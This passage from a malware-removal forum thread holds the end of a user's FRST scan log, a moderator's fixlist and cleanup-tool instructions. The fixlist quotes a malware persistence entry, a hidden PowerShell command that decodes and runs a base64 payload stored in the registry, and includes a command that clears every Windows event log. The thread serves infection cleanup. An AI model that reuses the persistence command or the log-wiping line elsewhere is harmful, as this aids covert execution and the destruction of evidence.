2017-04-16 21:29 - 2017-04-16 21:39 - 100223515 _____ C:\Users\USER\Downloads\Manchester United vs Chelsea 2-0 2017 - Highlights _ Goals.mp4
2017-04-16 14:57 - 2017-04-16 14:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01009.Wdf
2017-04-15 22:08 - 2017-04-15 23:03 - 43901813 _____ C:\Users\USER\Downloads\Cristiano Ronaldo ● Complete Goalscorer, Scoring in Every Way.mp4.part
2017-04-14 13:35 - 2017-04-14 13:36 - 00069080 _____ C:\Users\USER\Downloads\Tutorial for freelancers.pdf
2017-04-12 19:24 - 2017-04-12 19:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QPST
2017-04-12 19:24 - 2017-04-12 19:24 - 00000000 ____D C:\Program Files (x86)\QPST
2017-04-12 19:19 - 2017-04-12 19:21 - 08233607 _____ C:\Users\USER\Downloads\QPST Software_2.7.323 (Unlock-Huawei-Zte.Blogspot.Com).zip
2017-04-07 14:22 - 2017-04-07 14:22 - 00000890 _____ C:\Users\USER\Downloads\Documents - Shortcut.lnk
2017-04-06 17:02 - 2017-04-06 17:02 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-04-06 17:02 - 2017-04-06 17:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-04-06 11:55 - 2017-04-06 11:55 - 00000000 ____D C:\Users\USER\AppData\Roaming\Opera Software
2017-04-06 11:55 - 2017-04-06 11:55 - 00000000 ____D C:\Users\USER\AppData\Local\Opera Software
2017-04-06 11:54 - 2017-04-24 15:50 - 00003832 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1491468847
2017-04-06 11:54 - 2017-04-24 15:49 - 00001143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-04-06 11:54 - 2017-04-06 11:54 - 00001143 _____ C:\Users\Public\Desktop\Opera.lnk
2017-04-06 11:36 - 2017-04-24 15:50 - 00000000 ____D C:\Program Files (x86)\Opera
2017-04-05 13:26 - 2017-05-02 22:37 - 00000000 ____D C:\Users\USER\AppData\Roaming\BluetoothDriverInstaller
2017-04-05 13:26 - 2017-05-02 22:37 - 00000000 ____D C:\ProgramData\TEMP
2017-04-05 13:25 - 2017-04-05 13:25 - 03260416 _____ (BluetoothInstaller.com) C:\Users\USER\Downloads\BluetoothDriverInstaller_x64.exe
2017-04-05 10:32 - 2017-05-05 12:02 - 00000000 ____D C:\Windows\Minidump

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-05 12:41 - 2016-12-14 21:16 - 00000000 ____D C:\Users\USER\AppData\Roaming\Skype
2017-05-05 12:34 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\tracing
2017-05-05 12:02 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\Inf
2017-05-05 12:01 - 2017-01-16 09:06 - 00000000 ____D C:\Users\USER\AppData\LocalLow\Mozilla
2017-05-05 12:00 - 2017-02-06 12:06 - 00000000 ____D C:\Program Files (x86)\Ask.com
2017-05-05 11:38 - 2017-01-20 17:18 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2017-05-05 11:38 - 2013-08-22 17:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-05 11:29 - 2017-01-24 10:59 - 00000000 ____D C:\Program Files (x86)\Driver Downloader
2017-05-05 11:24 - 2016-11-27 13:45 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1975919165-801266099-53085287-1001
2017-05-05 11:12 - 2013-08-22 16:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-05-04 21:11 - 2016-11-27 13:58 - 00000000 ____D C:\Users\USER\AppData\Roaming\vlc
2017-05-04 15:57 - 2016-11-27 13:44 - 00818732 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-04 10:27 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\AppReadiness
2017-05-02 22:20 - 2016-11-27 13:39 - 00000000 ____D C:\Users\USER\AppData\Local\Packages
2017-05-02 10:02 - 2016-11-27 13:45 - 00000000 ____D C:\ProgramData\KMSAutoS
2017-05-01 19:07 - 2017-03-09 18:51 - 00000000 ____D C:\Users\USER\AppData\Roaming\Grammarly
2017-04-29 08:52 - 2016-11-29 01:28 - 00000000 ____D C:\Users\USER\AppData\Roaming\dvdcss
2017-04-28 20:44 - 2017-03-06 19:20 - 00000000 ____D C:\Users\USER\AppData\Roaming\WhatsApp
2017-04-28 20:38 - 2017-01-16 01:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-28 20:38 - 2016-11-27 14:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-28 17:22 - 2017-01-11 10:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-28 17:22 - 2017-01-11 10:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-28 12:02 - 2017-03-06 19:19 - 00000000 ____D C:\Users\USER\AppData\Local\SquirrelTemp
2017-04-27 16:48 - 2017-03-06 19:19 - 00000000 ____D C:\Users\USER\AppData\Local\WhatsApp
2017-04-27 16:47 - 2017-03-06 19:20 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2017-04-27 12:12 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\system32\NDF
2017-04-22 23:10 - 2016-11-27 13:59 - 00000000 ____D C:\Users\USER\Downloads\SHAREit
2017-04-22 22:28 - 2016-12-23 12:33 - 00000510 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2017-04-13 19:50 - 2017-01-30 16:13 - 00000000 ____D C:\Users\USER\AppData\Local\Package Cache
2017-04-13 18:08 - 2013-08-22 18:36 - 00000000 ____D C:\Windows\LiveKernelReports
2017-04-12 19:24 - 2016-11-27 13:47 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-04-06 17:02 - 2016-12-14 21:52 - 00002713 _____ C:\Users\Public\Desktop\Skype.lnk
2017-04-06 17:02 - 2016-12-14 21:15 - 00000000 ____D C:\ProgramData\Skype

==================== Files in the root of some directories =======

2017-01-24 11:11 - 2017-01-24 11:11 - 0794046 _____ () C:\Program Files\d32aaa99ba12e4ec21a96aaae151488b.rar
2017-04-25 19:58 - 2017-04-25 19:58 - 0199010 __RSH () C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-01 18:21 - 2017-04-01 18:21 - 0000000 ____H () C:\Users\USER\AppData\Roaming\Microsoft\AppData.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-05-03 20:18

==================== End of FRST.txt ============================


#2 JSntgRvr (Global Moderator, 11,579 posts)

Welcome. :)

  • Highlight the entire content of the quote box below.

 

Start::  
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [{245CAE4C-B7DC-4752-B92F-63DC8D25D4FD}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\wKNjXxBOSrsVKip').XFXEEJHACAA)));
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: F - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {3095b6bd-de5e-11e6-826c-001e101ff262} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767a9-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767d2-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a876c3c-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a87767e-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {87768129-1e8e-11e7-82b0-001e101f9824} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488244-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488259-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488288-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {b12ce2cb-f2e7-11e6-828b-ac9469c63d41} - "F:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de97fe40-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de980e8d-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c454ea-e7bf-11e6-8278-001e101f5f92} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c45c74-e7bf-11e6-8278-001e101f5f92} - "I:\Windows/AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f883703f-b67f-11e6-824f-d86e29ba0045} - "F:\LGAutoRun.exe"
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
Startup: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs [2017-04-05] ()
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw722D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw7048.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6DD6.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6C10.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6817.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw65F3.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw641D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw612E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw5DC2.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw590E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw54C8.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw51C9.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4F18.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4C78.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4979.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw46F7.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw40FB.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3DBE.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3B3C.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw36A7.tmp
2017-05-02 19:32 - 2017-05-02 19:32 - 00013188 ____H C:\Users\USER\Documents\~WRL0251.tmp
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset C:\resettcpip.txt
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
CMD: Bitsadmin /Reset /Allusers
EMPTYTEMP:
Reboot:
End::

  • Right click on it and select Copy.
  • Start FRST (FRST64) with Administrator privileges
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) will pop up and be saved in the same location the tool was run from.

Please copy and paste its contents in your next reply.

Please download Junkware Removal Tool to your Desktop.

  • Please close your security software to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
  • Please post the contents of JRT.txt into your reply.

Download AdwCleaner from here. Save the file to the desktop.

NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.

  • XP users: Double click the AdwCleaner icon to start the program.
  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

[screenshot: AdwCleaner console window]


  • Click the Scan button and wait for the scan to finish.
  • After the scan has finished, the window may or may not show what it found; above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • Click the Clean button.
  • Everything checked will be moved to Quarantine.
  • When the program has finished cleaning, a report appears. Once done it will ask to reboot; allow this.

[screenshot: AdwCleaner reboot prompt]


  • On reboot a log will be produced; please copy/paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[C0].txt

 



#3 JSntgRvr (Global Moderator, 11,579 posts)

Are you still with us?



#4 JSntgRvr (Global Moderator, 11,579 posts)

Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.

